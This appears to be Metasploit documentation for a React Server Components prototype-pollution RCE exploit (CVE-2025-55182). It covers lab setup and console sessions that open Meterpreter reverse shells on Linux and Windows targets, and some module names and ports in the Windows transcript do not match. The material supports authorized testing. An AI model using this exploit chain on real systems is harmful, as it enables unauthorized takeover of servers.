## Vulnerable Application

A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server
Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype
pollution during deserialization of RSC payloads by sending specially crafted multipart
requests with "__proto__", "constructor", or "prototype" as module names.

## Testing

### Linux

1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55182` directory
2. Build
```
docker build -t react2shell .
```
3. Run
```
docker run -p 3000:3000 react2shell
```
4. Open http://127.0.0.1:3000/ and make sure the app is available

### Windows

1. Download and install Node.js https://nodejs.org/en/download
2. Open `data\exploits\react2shell_unauth_rce_cve_2025_55182` directory
3. Build the application
```
npm run build
```
4. Start the application
```
npm start
```
5. Open http://127.0.0.1:3000/ and make sure the app is available

## Scenario

### Linux

```
msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RHOSTS 172.17.0.1
RHOSTS => 172.17.0.1
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.17.0.1:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:6666 -> 172.17.0.2:59608) at 2025-12-05 01:12:48 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           :  (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Windows

```
msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55182_scanner
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RHOSTS 192.168.19.137
RHOSTS => 192.168.19.137
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set target 1
target => 1
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set FETCH_SRVPORT 8082
FETCH_SRVPORT => 8082
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set FETCH_COMMAND CERTUTIL
FETCH_COMMAND => CERTUTIL
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (203846 bytes) to 192.168.19.137
[*] Meterpreter session 7 opened (192.168.19.130:4444 -> 192.168.19.137:49835) at 2025-12-05 03:00:47 -0500

meterpreter > getuid
Server username: DESKTOP-ABCDEF\vognik
meterpreter > sysinfo
Computer        : DESKTOP-ABCDEF
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```